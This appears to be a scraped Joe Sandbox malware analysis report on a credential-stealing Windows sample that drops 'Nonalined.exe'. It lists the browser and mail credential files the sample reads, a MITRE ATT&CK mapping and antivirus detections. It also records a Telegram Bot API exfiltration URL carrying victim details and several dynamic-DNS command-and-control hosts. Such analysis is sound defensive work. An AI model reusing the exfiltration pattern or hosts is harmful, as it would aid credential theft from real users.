Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR
Mitre Att&ck Matrix (one line per tactic; the number the report shows next to a technique is given in parentheses)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (1); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (311); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (151); Access Token Manipulation (1); Process Injection (311)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery (2); System Information Discovery (126); Security Software Discovery (321); Process Discovery (1); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Network Configuration Discovery (1); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service (1); Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1637274, Sample: NDQ211216GM08.exe.bin.exe, Startdate: 13/03/2025, Architecture: WINDOWS, Score: 100)

Start: contacts reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)), api.telegram.org (Uses the Telegram API (likely for C&C communication)) and 4 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Antivirus / Scanner detection for submitted sample, 5 other signatures; starts NDQ211216GM08.exe.bin.exe (36) and svchost.exe (1 1)
NDQ211216GM08.exe.bin.exe: drops C:\Users\user\AppData\Local\...\nsExec.dll (PE32); starts powershell.exe (30)
svchost.exe: contacts 127.0.0.1 (unknown unknown)
powershell.exe: drops C:\Users\user\AppData\Local\...\Nonalined.exe (PE32) and C:\Users\...\Nonalined.exe:Zone.Identifier (ASCII); signatures: Early bird code injection technique detected, Writes to foreign memory regions, Found suspicious powershell code related to unpacking or dynamic code loading, 3 other signatures; starts Nonalined.exe (15 8) and conhost.exe
Nonalined.exe: contacts api.telegram.org (149.154.167.220, 443, 49713, TELEGRAMRU, United Kingdom), checkip.dyndns.com (193.122.130.0, 49695, 49699, 49701, ORACLE-BMC-31898US, United States) and 3 other IPs or domains; signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Tries to steal Mail credentials (via file / registry access), 3 other signatures

Antivirus detection, initial sample
Source | Detection | Scanner | Label
NDQ211216GM08.exe.bin.exe | 63% | Virustotal |
NDQ211216GM08.exe.bin.exe | 63% | ReversingLabs | Win32.Ransomware.Generic
NDQ211216GM08.exe.bin.exe | 100% | Avira | TR/Injector.wdfal

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Nonalined.exe | 100% | Avira | TR/Injector.wdfal
C:\Users\user\AppData\Local\Temp\Nonalined.exe | 63% | ReversingLabs | Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\Nonalined.exe | 63% | Virustotal |
C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll | 0% | Virustotal |
          No Antivirus matches
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.74.206 | true | false | | high
drive.usercontent.google.com | 142.250.186.129 | true | false | | high
reallyfreegeoip.org | 104.21.80.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
URLs
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
URL strings found in memory
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a | Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/v20Y& | Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000203D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com | Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lBjr | powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlBjr | Nonalined.exe, 0000000B.00000002.2269171713.00000000203DC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/9A | Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.office.com/ | Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000004.00000002.2251563547.0000025204400000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | Nonalined.exe, 0000000B.00000003.1492131065.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527984035.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527968014.0000000004181000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004143000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en4 | Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | NDQ211216GM08.exe.bin.exe, Nonalined.exe.1.dr | false |
                                                                                                high
                                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.office.com/lBjrNonalined.exe, 0000000B.00000002.2269171713.000000002040D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://aborters.duckdns.org:8081Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.mpowershell.exe, 00000001.00000002.1430200400.000000000714F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.office.com/4Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://g.live.com/odclientsettings/Prod-C:edb.log.4.drfalse
                                                                                                              high
                                                                                                              http://anotherarmy.dns.army:8081Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://duckduckgo.com/chrome_newtabv20Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000004.00000003.1206920172.0000025204600000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                                                                                                                      high
                                                                                                                      https://reallyfreegeoip.org/xml/8.46.123.189$Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://reallyfreegeoip.orgNonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://drive.google.com/qANonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://gemini.google.com/app?q=Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.129 | drive.usercontent.google.com | United States | 15169 | GOOGLE (US) | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAM (RU) | false
142.250.74.206 | drive.google.com | United States | 15169 | GOOGLE (US) | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898 (US) | false
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENET (US) | false

IP
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1637274
Start date and time: 2025-03-13 13:32:27 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NDQ211216GM08.exe.bin.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/21@5/6
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 192
• Number of non-executed functions: 125
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.60.203.209, 172.202.163.200
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6456 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:33:42 | API Interceptor | 40x Sleep call for process: powershell.exe modified
08:34:00 | API Interceptor | 2x Sleep call for process: svchost.exe modified
08:34:37 | API Interceptor | 58513x Sleep call for process: Nonalined.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | SOA Since OCT DEC 241738316681530012900.bat | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | https://parta-doc.surge.sh/connexion.html | malicious | Unknown |
149.154.167.220 | PO-2513203-PDF.js | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | justificante de transferencia09454545.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | y79a2l1FY5.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer |
149.154.167.220 | https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg== | malicious | HTMLPhisher |
149.154.167.220 | https://possibles-x.com/ | malicious | HTMLPhisher |
193.122.130.0 | 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | QUOTATION_MARQUOTE312025#U00faPDF.scr | malicious | MSIL Logger | checkip.dyndns.org/
193.122.130.0 | efs.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | y79a2l1FY5.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.130.0 | mybestgirlfriendwalkingaroundtheworld.hta | malicious | Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.130.0 | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Yeni Sat#U0131nalma Sipari#U015fi.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | MALZEME G_0017 TABANCA SPREY NOZUL.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | file.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
104.21.80.1 | MG710417.exe | malicious | Azorult | gd53.cfd/TL341/index.php
104.21.80.1 | PRI_VTK250419A.exe | malicious | Lokibot | touxzw.ir/scc1/five/fre.php
104.21.80.1 | DHL AWB Receipt_pdf.bat.exe | malicious | FormBook | www.rbopisalive.cyou/2dxw/
104.21.80.1 | Marzec 2025-faktura.pdf.exe | malicious | FormBook | www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
104.21.80.1 | z1companyProfileandproducts.exe | malicious | FormBook | www.dd87558.vip/uoki/
104.21.80.1 | http://7a.ithuupvudv.ru | malicious | Unknown | 7a.ithuupvudv.ru/favicon.ico
104.21.80.1 | PRI_VTK250419A.exe | malicious | Lokibot | touxzw.ir/scc1/five/fre.php
104.21.80.1 | dfiCWCanbj.exe | malicious | Lokibot | touxzw.ir/sccc/five/fre.php
104.21.80.1 | laser (2).ps1 | malicious | FormBook | www.lucynoel6465.shop/jgkl/
104.21.80.1 | laser.ps1 | malicious | FormBook | www.tumbetgirislinki.fit/k566/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | QUOTATION_MARQUOTE312025#U00faPDF.scr | malicious | MSIL Logger | 193.122.130.0
checkip.dyndns.com | SOA Since OCT DEC 241738316681530012900.bat | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
checkip.dyndns.com | SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | PO-2513203-PDF.js | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | justificante de transferencia09454545.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | QUOTATION_FEBQUOTE312025#U00faPDF.scr | malicious | MSIL Logger | 158.101.44.242
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    Product Order Hirsch 1475.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 132.226.247.73
                                                                                                                                                    category05 sc110-11#U3000_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    reallyfreegeoip.org2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    QUOTATION_MARQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 104.21.32.1
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.32.1
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.112.1
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.112.1
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 104.21.112.1
                                                                                                                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 104.21.48.1
                                                                                                                                                    Product Order Hirsch 1475.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.64.1
                                                                                                                                                    api.telegram.org2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://parta-doc.surge.sh/connexion.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://possibles-x.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    TELEGRAMRUSimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 149.154.167.99
                                                                                                                                                    2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://parta-doc.surge.sh/connexion.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    Launcher.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                    • 149.154.167.99
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    CLOUDFLARENETUSInstaller64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    setupx 2.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
